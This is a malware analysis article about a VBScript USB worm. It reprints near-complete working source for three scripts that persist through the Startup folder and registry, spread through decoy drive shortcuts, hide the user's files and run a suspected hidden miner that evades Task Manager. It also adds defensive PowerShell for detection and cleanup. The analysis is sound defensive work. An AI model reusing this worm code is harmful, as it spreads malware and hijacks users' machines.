USB flash drives are portable removable storage devices: they are used in a wide range of settings, plugged in and unplugged frequently, and carried between machines, which makes them one of the main vehicles for spreading malware. Lightweight script viruses ride on these traits to infect silently, stay resident and spread in bulk, posing a serious threat to personal endpoints and their data. The malicious program analysed in this article is a USB-spreading virus written in VBScript. Its code is compact, under three hundred lines in total, yet it implements a complete set of malicious functions: endpoint infection, autostart at boot, USB monitoring, cross-device propagation and evasion of detection, all with a complete structure and clear logic. From an in-depth analysis of the file structure, infection mechanism, propagation flow and core code features, together with a telltale identifier left in the script, it can be tentatively concluded that the virus is accompanied by a cryptomining program. To clarify its attack principle, propagation path and potential harm, this article fully dissects its file composition, bidirectional infection flow and core malicious features, as a reference for identifying, removing and defending against this class of USB script virus.
1. Observed behaviour
After this virus infects a USB drive, it creates two hidden system folders and one shortcut named after the drive's volume label in the drive root. The two folders carrying the hidden+system attributes are named _ and WindowsServices. The _ folder is where all of the user's original files on the drive are moved to; the WindowsServices folder holds three virus scripts: movemenoreg.vbs, installer.vbs and helper.vbs. Reading the virus source shows that the directory should also contain a fourth program, WindowsServices.exe, which is absent from the sampled drive. The generated shortcut's name is identical to the drive's original volume label.
Figure: list of the virus files on the drive

Figure: opening the shortcut shows all of the original files on the USB drive

Figure: the WindowsServices directory contains the virus VBS script files
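The layout described above gives a defender a concrete checklist for triaging a suspect drive. The following PowerShell function is an added example, not code from the original post or from the sample, that scans a removable drive for exactly these indicators (the two Hidden+System folders, the dropped scripts and a root shortcut named after the volume label that runs movemenoreg.vbs) and can optionally move the user's files back out of _; the -DriveLetter and -Restore parameters are assumptions of this example.

```powershell
function Test-UsbWormInfection {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$DriveLetter,  # e.g. 'E' (assumed parameter name)
        [switch]$Restore                             # assumed switch: also move the user's files back
    )
    $letter = $DriveLetter.TrimEnd(':', '\')
    $root   = "$($letter):\"
    $label  = (Get-CimInstance Win32_LogicalDisk -Filter "DeviceID='$($letter):'").VolumeName
    $hits   = [System.Collections.Generic.List[string]]::new()

    # 1. the two folders the worm creates in the drive root, both marked Hidden + System
    foreach ($name in '_', 'WindowsServices') {
        $dir = Get-Item -LiteralPath (Join-Path $root $name) -Force -ErrorAction SilentlyContinue
        if ($dir -and $dir.Attributes.HasFlag([IO.FileAttributes]::Hidden) -and
                     $dir.Attributes.HasFlag([IO.FileAttributes]::System)) {
            $hits.Add("hidden system folder: $($dir.FullName)")
        }
    }
    # 2. the dropped scripts (WindowsServices.exe was missing from the sample, but check for it too)
    foreach ($f in 'movemenoreg.vbs', 'installer.vbs', 'helper.vbs', 'WindowsServices.exe') {
        $p = Join-Path $root "WindowsServices\$f"
        if (Test-Path -LiteralPath $p) { $hits.Add("worm file: $p") }
    }
    # 3. a root shortcut named after the volume label whose target/arguments run movemenoreg.vbs
    $lnk = Join-Path $root "$label.lnk"
    if ($label -and (Test-Path -LiteralPath $lnk)) {
        $sc = (New-Object -ComObject WScript.Shell).CreateShortcut($lnk)   # reads the .lnk, does not run it
        if ("$($sc.TargetPath) $($sc.Arguments)" -match 'movemenoreg\.vbs') {
            $hits.Add("decoy shortcut: $lnk -> $($sc.TargetPath) $($sc.Arguments)")
        }
    }

    if ($Restore -and $hits.Count -gt 0) {
        $dummy = Join-Path $root '_'
        if (Test-Path -LiteralPath $dummy) {
            # the worm only moved the user's files into '_', so moving them back restores the drive
            Get-ChildItem -LiteralPath $dummy -Force | Move-Item -Destination $root -Force
            if (-not (Get-ChildItem -LiteralPath $dummy -Force)) { Remove-Item -LiteralPath $dummy -Force }
        }
        Remove-Item -LiteralPath (Join-Path $root 'WindowsServices') -Recurse -Force -ErrorAction SilentlyContinue
        Remove-Item -LiteralPath $lnk -Force -ErrorAction SilentlyContinue
    }
    return $hits
}
# Test-UsbWormInfection -DriveLetter 'E'            # report only
# Test-UsbWormInfection -DriveLetter 'E' -Restore   # report, then clean the drive
```

Run it from a host that is not itself infected, because on an infected host installer.vbs re-drops the files within a second of any drive being attached.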

2. Source code walkthrough
2.1 The shortcut file
The shortcut file is the entry point: it tricks the user into clicking it and thereby launching the main virus file. The shortcut's target is:
%COMSPEC% /C .\WindowsServices\movemenoreg.vbs
Here %COMSPEC% is an environment variable that resolves to C:\Windows\system32\cmd.exe, so the shortcut uses cmd.exe to open the virus file movemenoreg.vbs. cmd.exe in turn hands the .vbs file to the script host registered for that extension, wscript.exe, which is why the scripts below look for wscript.exe processes when checking whether they are already running.
2.2 Contents of movemenoreg.vbs
' On error, continue with the next statement
on error resume next
' Declare variables
Dim strPath, objws, objFile, strFolder, Target, destFolder, objDestFolder, AppData, ws, objmove, pfolder, objWinMgmt, colProcess, vaprocess
' Get a WScript.Shell object
Set ws = WScript.CreateObject("WScript.Shell")
Target = "\WindowsServices"
' Work out this script's own folder (\WindowsServices) and its parent, which is the drive root
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
pfolder = objws.GetParentFolderName(strFolder)
' Open the folder named '_' in the drive root, where all of the user's original files were moved; this is what the user sees after clicking the shortcut
' In VBScript, Chr(n) returns the character with ASCII code n; ASCII 34 is the double quote ", so Chr(34) wraps the path in quotes
ws.Run Chr(34) & pfolder & "\_" & Chr(34)
' %AppData% is the user's roaming application data folder, C:\Users\<username>\AppData\Roaming
AppData = ws.ExpandEnvironmentStrings("%AppData%")
DestFolder = AppData & Target
' Create the destination folder, %AppData%\WindowsServices
if (not objws.folderexists(DestFolder)) then
objws.CreateFolder DestFolder
Set objDestFolder = objws.GetFolder(DestFolder)
end if
' Copy the four virus files to the destination folder and mark them Hidden + System.
' Files with these attributes stay invisible even when "Show hidden files" is ticked, unless "Hide protected operating system files (Recommended)" is also unticked
Call moveandhide ("\helper.vbs")
Call moveandhide ("\installer.vbs")
Call moveandhide ("\movemenoreg.vbs")
Call moveandhide ("\WindowsServices.exe")
objDestFolder.Attributes = objDestFolder.Attributes + 39
sub moveandhide (name)
if (not objws.fileexists(DestFolder & name)) then
' Copy the file
objws.CopyFile strFolder & name, DestFolder & "\"
Set objmove = objws.GetFile(DestFolder & name)
' Mark it as a hidden system file (39 = ReadOnly 1 + Hidden 2 + System 4 + Archive 32)
If not objmove.Attributes AND 39 then
objmove.Attributes = 0
objmove.Attributes = objmove.Attributes + 39
end if
end if
end sub
Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
' "WinMgmts:" is the WMI moniker prefix used in VBScript/WMI scripting to connect to the Windows WMI service;
' Root\CIMv2 is the default and most important WMI namespace, holding most system information: hardware, processes, files, services, registry, disks and so on.
' Put together, GetObject("WinMgmts:Root\Cimv2") obtains a WMI management object for the local machine.
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
' Use the WMI object to check whether helper.vbs is already running; if it is, exit this script.
For Each objProcess In colProcess
vaprocess = objProcess.CommandLine
if instr(vaprocess, "helper.vbs") then
WScript.quit
End if
Next
' Run helper.vbs
ws.Run Chr(34) & DestFolder & "\helper.vbs" & Chr(34)
Set ws = Nothing
2.3 helper.vbs
on error resume next
Dim ws, strPath, objws, objFile, strFolder, startupPath, MyScript, objWinMgmt, colProcess, vaprocess, miner, tskProcess, nkey, key
Set ws = WScript.CreateObject("WScript.Shell")
nkey = "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder\helper.lnk"
Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
strPath = strFolder & "\"
' Get the path of the user's Startup folder
startupPath = ws.SpecialFolders("startup")
miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34)
MyScript = "helper.vbs"
While True
' Check the StartupApproved entry for helper.lnk; if it exists, write 2 (the "enabled" marker) so the startup item stays enabled even if the user disabled it in Task Manager
key = Empty
key = ws.regread (nkey)
If (not IsEmpty(key)) then
ws.RegWrite nkey, 2, "REG_BINARY"
End if
If (not objws.fileexists(startupPath & "\helper.lnk")) then
' Create a shortcut to helper.vbs in the Startup folder so it runs at every logon
Set link = ws.CreateShortcut(startupPath & "\helper.lnk")
link.Description = "helper"
link.TargetPath =chr(34) & strPath & "helper.vbs" & chr(34)
link.WorkingDirectory = strPath
link.Save
End If
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
' Check whether installer.vbs is running; if not, start it
call procheck(colProcess, "installer.vbs")
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%WindowsServices.exe%'")
Set tskProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%Taskmgr.exe%'")
if colProcess.count = 0 And tskProcess.count = 0 then
' Run WindowsServices.exe with a hidden window (window style 0)
ws.Run miner, 0
ElseIf colProcess.count > 0 And tskProcess.count > 0 then
' If WindowsServices.exe is running while Task Manager is open, kill it (it is only started again once Task Manager is closed)
For Each objProcess In colProcess
ws.run "taskkill /PID " & objProcess.ProcessId , 0
Next
end if
WScript.Sleep 3000
Wend
'---------------------------------------------------------------------------------
sub procheck(checkme, procname)
For Each objProcess In checkme
vaprocess = objProcess.CommandLine
if instr(vaprocess, procname) then
Exit sub
End if
Next
ws.Run Chr(34) & strPath & procname & Chr(34)
end sub
'--------------------------------------------------------------------------------
2.4 installer.vbs
installer.vbs handles the infection of newly inserted USB drives.
on error resume next
DIM colEvents, objws, strComputer, objEvent, DestFolder, strFolder, Target, ws, objFile, objWMIService, DummyFolder, check, number, home, device, devicename, colProcess, vaprocess, objWinMgmt
strComputer = "."
Set ws = WScript.CreateObject("WScript.Shell")
Target = "\WindowsServices"
'where are we?
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
'Checking for USB instance
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
' Subscribe to logical-disk change events, polled every second
Set colEvents = objWMIService.ExecNotificationQuery ("SELECT * FROM __InstanceOperationEvent WITHIN 1 WHERE " & "TargetInstance ISA 'Win32_LogicalDisk'")
Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
While True
' Check whether helper.vbs is running; if not, start it
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
call procheck(colProcess, "helper.vbs")
' Block until the next event arrives
Set objEvent = colEvents.NextEvent
If objEvent.TargetInstance.DriveType = 2 Then
If objEvent.Path_.Class = "__InstanceCreationEvent" Then
' DriveType 2 is a removable disk, and a creation event means a new USB drive was just inserted
device = objEvent.TargetInstance.DeviceID
devicename = objEvent.TargetInstance.VolumeName
DestFolder = device & "\WindowsServices"
DummyFolder = device & "\" & "_"
' Create the destination folder (\WindowsServices) in the drive root and mark it Hidden + System
if (not objws.folderexists(DestFolder)) then
objws.CreateFolder DestFolder
Set objDestFolder = objws.GetFolder(DestFolder)
objDestFolder.Attributes = objDestFolder.Attributes + 39
end if
' Copy the four virus files to the destination folder
Call moveandhide ("\helper.vbs")
Call moveandhide ("\installer.vbs")
Call moveandhide ("\movemenoreg.vbs")
Call moveandhide ("\WindowsServices.exe")
' Create a shortcut in the drive root, named after the volume label and given a standard drive icon, that runs movemenoreg.vbs via %COMSPEC% in a minimised window
if (not objws.fileexists (device & devicename & ".lnk")) then
Set link = ws.CreateShortcut(device & "\" & devicename & ".lnk")
link.IconLocation = "%windir%\system32\SHELL32.dll, 7"
link.TargetPath = "%COMSPEC%"
link.Arguments = "/C .\WindowsServices\movemenoreg.vbs"
link.windowstyle = 7
link.Save
End If
' Create the folder '_' in the drive root and mark it Hidden (2) + System (4)
if (not objws.folderexists(DummyFolder)) then
objws.CreateFolder DummyFolder
Set objDestFolder = objws.GetFolder(DummyFolder)
objDestFolder.Attributes = objDestFolder.Attributes + 2 + 4
End If
set check = objws.getFolder(device)
' Move all of the user's files and folders into '_'
Call checker(check)
End If
End If
Wend
' Move everything in the drive root into '_', except the decoy shortcut, '_' itself, WindowsServices and System Volume Information
sub checker (path)
set home = path.Files
For Each file in home
Select Case file.Name
Case devicename & ".lnk"
'nothings
Case Else
objws.MoveFile path & file.Name, DummyFolder & "\"
End Select
Next
set home = path.SubFolders
For Each home in home
Select Case home
Case path & "_"
'nothings
Case path & "WindowsServices"
'nothings
Case path & "System Volume Information"
'nothings'
Case Else
objws. MoveFolder home, DummyFolder & "\"
End Select
Next
end sub
'------------------------------------------------------------
' Same copy-and-hide routine as in movemenoreg.vbs (39 = ReadOnly + Hidden + System + Archive)
sub moveandhide (name)
if (not objws.fileexists(DestFolder & name)) then
objws.CopyFile strFolder & name, DestFolder & "\"
Set objmove = objws.GetFile(DestFolder & name)
If not objmove.Attributes AND 39 then
objmove.Attributes = 0
objmove.Attributes = objmove.Attributes + 39
end if
end if
end sub
'------------------------------------------------------------
' Start procname unless a wscript.exe process already has it on its command line
sub procheck(checkme, procname)
For Each objProcess In checkme
vaprocess = objProcess.CommandLine
if instr(vaprocess, procname) then
Exit sub
End if
Next
ws.Run Chr(34) & strFolder & "\" & procname & Chr(34)
end sub
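helper.vbs and installer.vbs keep each other alive through procheck, and helper.vbs re-creates the Startup shortcut and re-enables the StartupApproved value every 3 seconds, so a cleanup has to stop the processes before touching the files. The following PowerShell function is an added example, not code from the original post or from the malware author, that checks a host for exactly the persistence described in helper.vbs and installer.vbs and optionally removes it; the -Remove switch is an assumption of this example.

```powershell
function Get-UsbWormPersistence {
    [CmdletBinding()]
    param([switch]$Remove)   # assumed switch: also tear the persistence down
    $hits   = [System.Collections.Generic.List[string]]::new()
    $appDir = Join-Path $env:APPDATA 'WindowsServices'
    $lnk    = Join-Path ([Environment]::GetFolderPath('Startup')) 'helper.lnk'
    $regKey = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder'

    # 1. live processes: wscript.exe hosting one of the three scripts, or the dropped WindowsServices.exe
    $running = @(Get-CimInstance Win32_Process | Where-Object {
        ($_.Name -eq 'wscript.exe' -and $_.CommandLine -match 'helper\.vbs|installer\.vbs|movemenoreg\.vbs') -or
        $_.Name -eq 'WindowsServices.exe' })
    foreach ($p in $running) { $hits.Add("process $($p.ProcessId) $($p.Name): $($p.CommandLine)") }

    # 2. on-disk persistence: Startup-folder shortcut, StartupApproved value, dropped folder under %AppData%
    if (Test-Path -LiteralPath $lnk)    { $hits.Add("startup shortcut: $lnk") }
    if (Test-Path -LiteralPath $appDir) { $hits.Add("dropped folder: $appDir") }
    $reg = Get-ItemProperty -Path $regKey -Name 'helper.lnk' -ErrorAction SilentlyContinue
    if ($reg) {
        $bytes = ($reg.'helper.lnk' | ForEach-Object { '{0:X2}' -f $_ }) -join ' '
        $hits.Add("StartupApproved value helper.lnk = $bytes")
    }

    if ($Remove -and $hits.Count -gt 0) {
        # helper.vbs and installer.vbs restart each other and helper.lnk is recreated every 3 s,
        # so stop every process first, then remove the files and the registry value
        foreach ($p in $running) { Stop-Process -Id $p.ProcessId -Force -ErrorAction SilentlyContinue }
        Remove-Item -LiteralPath $lnk -Force -ErrorAction SilentlyContinue
        Remove-ItemProperty -Path $regKey -Name 'helper.lnk' -ErrorAction SilentlyContinue
        Remove-Item -LiteralPath $appDir -Recurse -Force -ErrorAction SilentlyContinue
    }
    return $hits
}
# Get-UsbWormPersistence           # report only
# Get-UsbWormPersistence -Remove   # report, then remove the persistence
```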
3. Workflow
3.1 Infection from USB drive to computer
When an infected USB drive is plugged into a computer and the user double-clicks the shortcut named after the drive in its root, the malware executes: the virus body copies itself to %AppData%\WindowsServices and writes an autostart entry for persistence. From then on it continuously monitors for removable storage being attached, and as soon as a new USB drive is inserted it copies the full set of virus files to that drive, completing the spread.
3.2 Reverse infection from host to USB drive
Once an infected computer boots, the malware loads with the system and stays resident in the background. When it detects a USB drive being attached, it creates two hidden folders, _ and WindowsServices, in the drive root: it moves all of the user's original files on the drive into _, and writes the full set of four malicious programs into WindowsServices. At the same time it creates a shortcut in the drive root. Double-clicking that shortcut starts the malicious script movemenoreg.vbs directly, completing the infection of the drive.
4. Summary
This VBS malicious script is under three hundred lines, yet it fully implements the core malicious functions of host infection, USB propagation and evading removal; its variable naming and division into functional modules are disciplined, and the author clearly has mature experience in VBS and malware development.
The sample is missing the WindowsServices.exe file, so the attacker's complete intent cannot be determined, but the code in helper.vbs that invokes the program suggests that the companion program is most likely a cryptominer:
miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34)
Notice: this article analyses the virus source code purely for learning and sharing knowledge; the author bears no responsibility for any consequences.